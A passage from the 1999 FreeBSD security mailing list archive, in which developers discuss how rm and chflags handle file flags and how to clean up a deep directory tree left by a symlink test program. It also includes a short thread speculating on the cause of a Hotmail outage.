(Postfix) with ESMTP id BDB0F15855 for ; Mon, 30 Aug 1999 12:15:22 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id MAA66340; Mon, 30 Aug 1999 12:14:26 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908301914.MAA66340@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: from Bill Fumerola at "Aug 30, 1999 01:17:24 pm" To: billf@jade.chc-chimes.com (Bill Fumerola) Date: Mon, 30 Aug 1999 12:14:26 -0700 (PDT) Cc: imp@village.org (Warner Losh), bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Mon, 30 Aug 1999, Rodney W. Grimes wrote: > > > > I'd also like to have a new flag to rm. -F. One -F will be > > > chflags nouflags foo ; rm -f foo > > > while two -F will be > > > chflags 0 foo ; rm -f foo > > > > I have a problem with this, it means updating 1 more chunk of code > > should the set of items in uflags change. > > Or updating rc if uflags change. chflags nouflags foo in /etc/rc* would not need to change if uflags changes. chflags might, but not /etc/rc* -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 19: 1:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 0228514C08 for ; Mon, 30 Aug 1999 19:01:28 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id MAA01906; Tue, 31 Aug 1999 12:00:57 +1000 Date: Tue, 31 Aug 1999 12:00:57 +1000 From: Bruce Evans Message-Id: <199908310200.MAA01906@godzilla.zeta.org.au> To: freebsd@gndrsh.dnsmgr.net, imp@village.org Subject: Re: Not sure if you got it... Cc: bde@zeta.org.au, dynamo@ime.net, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> I'd also like to have a new flag to rm. -F. One -F will be >> chflags nouflags foo ; rm -f foo >> while two -F will be >> chflags 0 foo ; rm -f foo > >I have a problem with this, it means updating 1 more chunk of code >should the set of items in uflags change. Interesting point. Support for removing user flags has already rotted in rm. The UF_NOUNLINK flag was added on 1997/06/02 but rm -rf still doesn't clear it. Support for the nounlnk flags is also broken in chflags and ls. The flags are negative logic, like UF_NODUMP, and this is consistently handled backwards (nodump was only backwards in the manpage). Thus you have to say `chflags uunlnk ...' to set the _NO_ uunlnk flag, and ls tells you that the uunlnk flag is set despite there being no such flag. The abbreviation uunlink as uunlnk doesn't help. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 19: 4:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 6604D14F3C for ; Mon, 30 Aug 1999 19:04:54 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id MAA02098; Tue, 31 Aug 1999 12:02:22 +1000 Date: Tue, 31 Aug 1999 12:02:22 +1000 From: Bruce Evans Message-Id: <199908310202.MAA02098@godzilla.zeta.org.au> To: freebsd@gndrsh.dnsmgr.net, imp@village.org Subject: Re: Not sure if you got it... Cc: bde@zeta.org.au, dynamo@ime.net, security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >: > while two -F will be >: > chflags 0 foo ; rm -f foo >: >: I have a problem with this, it means updating 1 more chunk of code >: should the set of items in uflags change. > >I was going to define something like UF_USERFLAGS and SF_SYSFLAGS as >well... Use the standard macros UF_SETTABLE and SF_SETTABLE. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Aug 30 19:12:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E0367159A4 for ; Mon, 30 Aug 1999 19:12:26 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA05311; Mon, 30 Aug 1999 20:12:07 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA08438; Mon, 30 Aug 1999 20:11:29 -0600 (MDT) Message-Id: <199908310211.UAA08438@harmony.village.org> To: Bruce Evans Subject: Re: Not sure if you got it... Cc: freebsd@gndrsh.dnsmgr.net, dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Tue, 31 Aug 1999 12:02:22 +1000." <199908310202.MAA02098@godzilla.zeta.org.au> References: <199908310202.MAA02098@godzilla.zeta.org.au> Date: Mon, 30 Aug 1999 20:11:29 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908310202.MAA02098@godzilla.zeta.org.au> Bruce Evans writes: : Use the standard macros UF_SETTABLE and SF_SETTABLE. I'm silly for not seeing them... Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 0:22: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id E30BA15A11 for ; Tue, 31 Aug 1999 00:22:01 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id AAA68164; Tue, 31 Aug 1999 00:20:40 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908310720.AAA68164@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: <199908310200.MAA01906@godzilla.zeta.org.au> from Bruce Evans at "Aug 31, 1999 12:00:57 pm" To: bde@zeta.org.au (Bruce Evans) Date: Tue, 31 Aug 1999 00:20:40 -0700 (PDT) Cc: imp@village.org, dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >> I'd also like to have a new flag to rm. -F. One -F will be > >> chflags nouflags foo ; rm -f foo > >> while two -F will be > >> chflags 0 foo ; rm -f foo > > > >I have a problem with this, it means updating 1 more chunk of code > >should the set of items in uflags change. > > Interesting point. Support for removing user flags has already rotted > in rm. The UF_NOUNLINK flag was added on 1997/06/02 but rm -rf still > doesn't clear it. Actually I think that was done on purpose. Since UF_NOUNLINK is to protect the user from removing the file it would kinda make since that rm -rf should bitch loudly when asked to rm a UF_NOUNLINK flagged file shouldn't it? IMHO, rm should not know about flags at all. chflags knows about flags, and if we ever get acl's rm should not be tought about them either, some other command (acl(1) anyone) will know how to deal with them. > Support for the nounlnk flags is also broken in chflags and ls. > The flags are negative logic, like UF_NODUMP, and this is consistently > handled backwards (nodump was only backwards in the manpage). Thus you > have to say `chflags uunlnk ...' to set the _NO_ uunlnk flag, and ls > tells you that the uunlnk flag is set despite there being no such flag. > The abbreviation uunlink as uunlnk doesn't help. Can I simply state that ``flags'' are broken in general, the concept was not well though out as to orthagonality, implementation impacts and completeness. It's a poor mans attempt to bandaid in 6 or so fixed valued acl's. I know it is all we've got, and I suppose that something is better than nothing, _until_ (and it has just been pointed out again how to use these for DOS) they cause security problems. As far as I am concerned the whole flags thing should die a quick and ugly death as non functional bloat with serious security concerns being the #1 reason. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 7:50:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7396814FED for ; Tue, 31 Aug 1999 07:50:47 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id IAA07886; Tue, 31 Aug 1999 08:50:45 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id IAA11239; Tue, 31 Aug 1999 08:50:15 -0600 (MDT) Message-Id: <199908311450.IAA11239@harmony.village.org> To: "Rodney W. Grimes" Subject: Re: Not sure if you got it... Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG In-reply-to: Your message of "Tue, 31 Aug 1999 00:20:40 PDT." <199908310720.AAA68164@gndrsh.dnsmgr.net> References: <199908310720.AAA68164@gndrsh.dnsmgr.net> Date: Tue, 31 Aug 1999 08:50:15 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908310720.AAA68164@gndrsh.dnsmgr.net> "Rodney W. Grimes" writes: : Actually I think that was done on purpose. Since UF_NOUNLINK is to : protect the user from removing the file it would kinda make since : that rm -rf should bitch loudly when asked to rm a UF_NOUNLINK flagged : file shouldn't it? : : IMHO, rm should not know about flags at all. chflags knows about flags, : and if we ever get acl's rm should not be tought about them either, : some other command (acl(1) anyone) will know how to deal with them. Yes, but if force doesn't mean try your best to delete it, then it is kinda useless... There are times that policy is to kill everything, flags to the contrary non-with-standing. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 8:57:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from isr4033.urh.uiuc.edu (isr4033.urh.uiuc.edu [130.126.208.49]) by hub.freebsd.org (Postfix) with SMTP id D443F15910 for ; Tue, 31 Aug 1999 08:57:13 -0700 (PDT) (envelope-from ftobin@uiuc.edu) Received: (qmail 45983 invoked by uid 1000); 31 Aug 1999 15:56:40 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 31 Aug 1999 15:56:40 -0000 Date: Tue, 31 Aug 1999 10:56:40 -0500 (CDT) From: Frank Tobin X-Sender: ftobin@isr4033.urh.uiuc.edu To: FreeBSD-security Mailing List Subject: Re: Not sure if you got it... In-Reply-To: <199908311450.IAA11239@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh, at 08:50 on Tue, 31 Aug 1999, wrote: > : IMHO, rm should not know about flags at all. chflags knows about flags, > : and if we ever get acl's rm should not be tought about them either, > : some other command (acl(1) anyone) will know how to deal with them. > > Yes, but if force doesn't mean try your best to delete it, then it is > kinda useless... There are times that policy is to kill everything, > flags to the contrary non-with-standing. Correct me if these analyses are incorrect, but it seems we have a couple options here to remove entire structures with flags inside of it: 1) Give rm -F. This would perform as per the proposal. The arguments against this seem to be that this breaks traditional unix philosophy of atomic elements. 2) Have rm -rf automatically remove flags. The arguments against this is that some flags could be used as protectors/dummy-resistant flags, to prevent accidental removal of file. 3) Use chflags -R , followed by rm -rf. This two step process is consistent with unix philosophy. This is probably the cleanest (traditionally) solution. However, it causes two disk passes instead of one. 4) Use find(1) with -exec chflags and rm. This has the downside of many processes getting started (one chflags and one rm for each node), and again, more disk usage (we don't all use SCSI yet). Additionally, solutions 3 and 4 have downside of having to train users to remember to use such a multiple-step pass in scripts and such; if these implementations are chosen, the need to remove flags with chflags(1) should be documented in the manpage of rm(1) under the -f option (or BUGS). Personally, I vote for solution 1), adding a -F flag. Since we added flags to the filesystem, we should have a means to forcibly override them also (where appropriate), when we know we have to override them. Since I don't like 3) and 4), and 2) is dangerous, I have to settle on 1). One problem with my position, though, is that we have to consider what happens if we add flags like 'noread'. Should cp(1) be able to override this? Currently, this is just a hypothetical situation, but one should at least try to be a little consistent in design (which is why I love having -R available for most operations; no other OS seems to have -R for tools such as grep). -- Frank Tobin "To learn what is good and what is to be www.neverending.org/~ftobin valued, those truths which cannot be shaken or changed." Myst: The Book of Atrus PGPenvelope = GPG and PGP5 + Pine PGP: 4F86 3BBB A816 6F0A 340F www.neverending.org/~ftobin/resources.html 6003 56FF D10A 260C 4FA3 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 13: 8:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 0501114C1C for ; Tue, 31 Aug 1999 13:08:29 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id NAA72350; Tue, 31 Aug 1999 13:07:43 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908312007.NAA72350@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: <199908311450.IAA11239@harmony.village.org> from Warner Losh at "Aug 31, 1999 08:50:15 am" To: imp@village.org (Warner Losh) Date: Tue, 31 Aug 1999 13:07:43 -0700 (PDT) Cc: bde@zeta.org.au (Bruce Evans), dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > In message <199908310720.AAA68164@gndrsh.dnsmgr.net> "Rodney W. Grimes" writes: > : Actually I think that was done on purpose. Since UF_NOUNLINK is to > : protect the user from removing the file it would kinda make since > : that rm -rf should bitch loudly when asked to rm a UF_NOUNLINK flagged > : file shouldn't it? > : > : IMHO, rm should not know about flags at all. chflags knows about flags, > : and if we ever get acl's rm should not be tought about them either, > : some other command (acl(1) anyone) will know how to deal with them. > > Yes, but if force doesn't mean try your best to delete it, then it is > kinda useless... Ahhh.. you said it not me... one more misconceived and not easily correctly implemented option. > There are times that policy is to kill everything, > flags to the contrary non-with-standing. Unix commands should not implement policy, only methods. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 13:57:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from maxim.gba.oz.au (gba.tmx.com.au [203.9.155.249]) by hub.freebsd.org (Postfix) with SMTP id 598FE14C82 for ; Tue, 31 Aug 1999 13:57:26 -0700 (PDT) (envelope-from gjb-freebsd@gba.oz.au) Received: (qmail 21738 invoked from network); 1 Sep 1999 06:53:53 +1000 Received: from alice.gba.oz.au (192.168.1.11) by maxim.gba.oz.au with SMTP; 1 Sep 1999 06:53:53 +1000 Received: (qmail 21054 invoked by uid 1001); 1 Sep 1999 06:53:52 +1000 Message-ID: <19990831205352.21053.qmail@alice.gba.oz.au> X-Posted-By: GBA-Post 1.03 20-Sep-1998 X-PGP-Fingerprint: 5A91 6942 8CEA 9DAB B95B C249 1CE1 493B 2B5A CE30 Date: Wed, 01 Sep 1999 06:53:51 +1000 From: Greg Black To: Frank Tobin Cc: FreeBSD-security Mailing List Subject: Re: Not sure if you got it... References: In-reply-to: of Tue, 31 Aug 1999 10:56:40 EST Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Correct me if these analyses are incorrect, but it seems we have a couple > options here to remove entire structures with flags inside of it: > > 1) Give rm -F. This would perform as per the proposal. The arguments > against this seem to be that this breaks traditional unix philosophy of > atomic elements. > > 2) Have rm -rf automatically remove flags. The arguments against this is > that some flags could be used as protectors/dummy-resistant flags, to > prevent accidental removal of file. I'm against the first two for the reasons given. > 3) Use chflags -R , followed by rm -rf. This two step > process is consistent with unix philosophy. This is probably the cleanest > (traditionally) solution. However, it causes two disk passes instead of > one. This one should be expressed more like: rm -rf dir || { echo second pass to remove flags chflags -R nouserflags dir rm -rf dir } This way, it's only a single pass in the common case where there are no files with flags that stop the rm. The chflags pass will only find the few files with flags set as the rest have already been removed. This makes clear what is happening and at least acknowledges that certain flags are *supposed* to stop rm. > 4) Use find(1) with -exec chflags and rm. This has the downside of many > processes getting started (one chflags and one rm for each node), and > again, more disk usage (we don't all use SCSI yet). This one sucks. > Additionally, solutions 3 and 4 have downside of having to train users to > remember to use such a multiple-step pass in scripts and such; if these > implementations are chosen, the need to remove flags with chflags(1) > should be documented in the manpage of rm(1) under the -f option (or > BUGS). The users who need to learn how to deal with flags had to learn how to enable them in the first place. There's not much new training to do, and it can be managed by minor additions to the relevant man pages. One additional reason not to put flag-changing capabilities in rm is that flags are, by design, intended to prevent certain uses of rm. For instance, if an admin wants to put en empty .rhosts file in users' home directories he can do this by making it root-owned with the uchg flag. The user can still write in (and remove files from) his home dir, but he cannot remove that file. The thing that is really wrong with the flags is the absurd names they have been given as in these two examples: * nodump sets a flag, dump unsets it * uchg sets a flag, nouchg unsets it It would have made much more sense if the second one was changed so that: * nodump still sets a flag, while dump unsets it * nouchg sets a flag ("user flag for no change"), uchg unsets it Of course, changing things like this once the bad design has escaped is non-trivial. -- Greg Black -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 18:23:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from kleopatra.acc.umu.se (kleopatra.acc.umu.se [130.239.18.150]) by hub.freebsd.org (Postfix) with ESMTP id 7FB8515404 for ; Tue, 31 Aug 1999 18:23:19 -0700 (PDT) (envelope-from saska@acc.umu.se) Received: from montezuma.acc.umu.se (saska@montezuma-fddi.acc.umu.se [192.168.18.147]) by kleopatra.acc.umu.se (8.9.3/8.9.3) with ESMTP id DAA31540 for ; Wed, 1 Sep 1999 03:23:17 +0200 Received: (from saska@localhost) by montezuma.acc.umu.se (8.9.3/8.9.3) id DAA08309 for freebsd-security@freebsd.org; Wed, 1 Sep 1999 03:23:16 +0200 (MET DST) Date: Wed, 1 Sep 1999 03:23:16 +0200 From: Markus Holmberg To: freebsd-security@freebsd.org Subject: how to remove directories made by the core-following-symlink test code? Message-ID: <19990901032316.A8300@montezuma.acc.umu.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.7i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wanted to test if the 2.2.8-STABLE production box here was vulnerable, so I compiled and executed with the deep dir structure as a result.. Am I missing something very trivial here, or how am I supposed to do to remove the very deep directory structure that was made by the core-follow-symlink test/exploit/whatever code? A normal "rm -rf " won't do it.. It ends with lots of these: ******* CUT ****** rm: 13456/ YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: Directory not empty rm: 13456/ YOUR PUBLIC SSH1 KEY (-b 512) GOES HERE! : Directory not empty rm: 13456: Directory not empty ******* CUT ****** Tried everything I could think of! Any help is appreciated..! :) (don't want /etc/security to core dump each and every night :/) Markus -- Markus Holmberg | Give me UNIX or give me a typewriter. saska@acc.umu.se | http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 18:52:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id 411A014E4E for ; Tue, 31 Aug 1999 18:52:14 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id DAA18081; Wed, 1 Sep 1999 03:49:55 +0200 (CEST) Message-ID: <19990901034954.A18062@foobar.franken.de> Date: Wed, 1 Sep 1999 03:49:54 +0200 From: Harold Gutch To: Markus Holmberg , freebsd-security@FreeBSD.ORG Subject: Re: how to remove directories made by the core-following-symlink test code? References: <19990901032316.A8300@montezuma.acc.umu.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990901032316.A8300@montezuma.acc.umu.se>; from Markus Holmberg on Wed, Sep 01, 1999 at 03:23:16AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Sep 01, 1999 at 03:23:16AM +0200, Markus Holmberg wrote: > Wanted to test if the 2.2.8-STABLE production box here was vulnerable, so I > compiled and executed with the deep dir structure as a result.. > > Am I missing something very trivial here, or how am I supposed to do to > remove the very deep directory structure that was made by the > core-follow-symlink test/exploit/whatever code? > > A normal "rm -rf " won't do it.. > I had the same problem - my (quick) solution was something like while (true) do mv * a && cd a done which would rename every directory to "a" (as every directory contains only a single subdirectory), which then could be removed with "rm -rf ". bye, Harold -- Sleep is an abstinence syndrome wich occurs due to lack of caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 19:55:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from mx2.asiaonline.net (mx2.asiaonline.net [202.85.0.14]) by hub.freebsd.org (Postfix) with ESMTP id E6C2C15474 for ; Tue, 31 Aug 1999 19:55:44 -0700 (PDT) (envelope-from cckok00@stlinux.ouhk.edu.hk) Received: from stlinux.ouhk.edu.hk (ip95-126.asiaonline.net [202.85.95.126]) by mx2.asiaonline.net (8.9.3/8.9.3) with ESMTP id KAA02579 for ; Wed, 1 Sep 1999 10:54:13 +0800 (HKT) Message-ID: <37CC959B.9CA5F03A@stlinux.ouhk.edu.hk> Date: Wed, 01 Sep 1999 10:55:23 +0800 From: Peter Kok X-Mailer: Mozilla 4.6 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: hotmail Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello all I heard from news that hotmail was broken and the service was forced to stop about two hours. As i know hotmail is operated by freebsd. Is it about the security of freebsd? Now I would like to know more about security of freebsd. thank you regards Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 20: 0:26 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 7C1DC14E7B; Tue, 31 Aug 1999 20:00:25 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 6E4111CD5D7; Tue, 31 Aug 1999 20:00:24 -0700 (PDT) (envelope-from kris@hub.freebsd.org) Date: Tue, 31 Aug 1999 20:00:24 -0700 (PDT) From: Kris Kennaway To: Peter Kok Cc: security@freebsd.org Subject: Re: hotmail In-Reply-To: <37CC959B.9CA5F03A@stlinux.ouhk.edu.hk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Sep 1999, Peter Kok wrote: > Hello all > > I heard from news that hotmail was broken and the service was forced to > stop about two hours. As i know hotmail is operated by freebsd. Is it > about the security of freebsd? Almost certainly not - despite Microsoft's claims of it being a hacker, it's much more likely that the original cause was a boneheaded CGI error by a hotmail programmer. A tool (like an OS) is only as good as the craftsman who wields it. > Now I would like to know more about security of freebsd. What do you want to know? Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 20: 1: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from noc.santacruz.org (noc.santacruz.org [209.133.111.168]) by hub.freebsd.org (Postfix) with ESMTP id 0804F154A7 for ; Tue, 31 Aug 1999 20:00:57 -0700 (PDT) (envelope-from klynn@santacruz.org) Received: by noc.santacruz.org (Postfix, from userid 1003) id A3AD8CD4A; Tue, 31 Aug 1999 20:03:26 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by noc.santacruz.org (Postfix) with ESMTP id 939F1CD49; Tue, 31 Aug 1999 20:03:26 -0700 (PDT) Date: Tue, 31 Aug 1999 20:03:26 -0700 (PDT) From: Kevin Lynn To: Peter Kok Cc: security@freebsd.org Subject: Re: hotmail In-Reply-To: <37CC959B.9CA5F03A@stlinux.ouhk.edu.hk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes.. but chances are it's because of a security hole that wasn't because of freebsd as slashdot posted something about the security hole being exploitable via some web page that would let you read other peoples mail. Kevin On Wed, 1 Sep 1999, Peter Kok wrote: > Hello all > > I heard from news that hotmail was broken and the service was forced to > stop about two hours. As i know hotmail is operated by freebsd. Is it > about the security of freebsd? > Now I would like to know more about security of freebsd. > > thank you > > regards > Peter > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 20:13:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from kinetic.tiora.net (kinetic.tiora.net [206.251.130.15]) by hub.freebsd.org (Postfix) with ESMTP id 78DBA14D95 for ; Tue, 31 Aug 1999 20:13:29 -0700 (PDT) (envelope-from liam@kinetic.tiora.net) Received: from localhost (liam@localhost) by kinetic.tiora.net (8.9.3/8.9.3) with ESMTP id UAA00719; Tue, 31 Aug 1999 20:12:31 -0700 (PDT) Date: Tue, 31 Aug 1999 20:12:31 -0700 (PDT) From: Liam Slusser To: Kevin Lynn Cc: Peter Kok , security@FreeBSD.ORG Subject: Re: hotmail In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I thought hotmail was using Sun hardware running Solaris? Anybody know? liam System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address Lowered turbo powered Honda Civic's are really cool. <---------- my quote On Tue, 31 Aug 1999, Kevin Lynn wrote: > Yes.. but chances are it's because of a security hole that wasn't because > of freebsd as slashdot posted something about the security hole being > exploitable via some web page that would let you read other peoples mail. > > Kevin > > On Wed, 1 Sep 1999, Peter Kok wrote: > > > Hello all > > > > I heard from news that hotmail was broken and the service was forced to > > stop about two hours. As i know hotmail is operated by freebsd. Is it > > about the security of freebsd? > > Now I would like to know more about security of freebsd. > > > > thank you > > > > regards > > Peter > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 31 20:14:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id F04D414CC6 for ; Tue, 31 Aug 1999 20:14:44 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id NAA11599; Wed, 1 Sep 1999 13:14:38 +1000 Date: Wed, 1 Sep 1999 13:14:38 +1000 From: Bruce Evans Message-Id: <199909010314.NAA11599@godzilla.zeta.org.au> To: ftobin@uiuc.edu, gjb-freebsd@gba.oz.au Subject: Re: Not sure if you got it... Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >The thing that is really wrong with the flags is the absurd >names they have been given as in these two examples: > > * nodump sets a flag, dump unsets it > * uchg sets a flag, nouchg unsets it > >It would have made much more sense if the second one was changed >so that: > > * nodump still sets a flag, while dump unsets it > * nouchg sets a flag ("user flag for no change"), uchg unsets it The immutable flags are well named in the kernel. You can still spell the user immutable flag as `immutable' in chflags(8), but 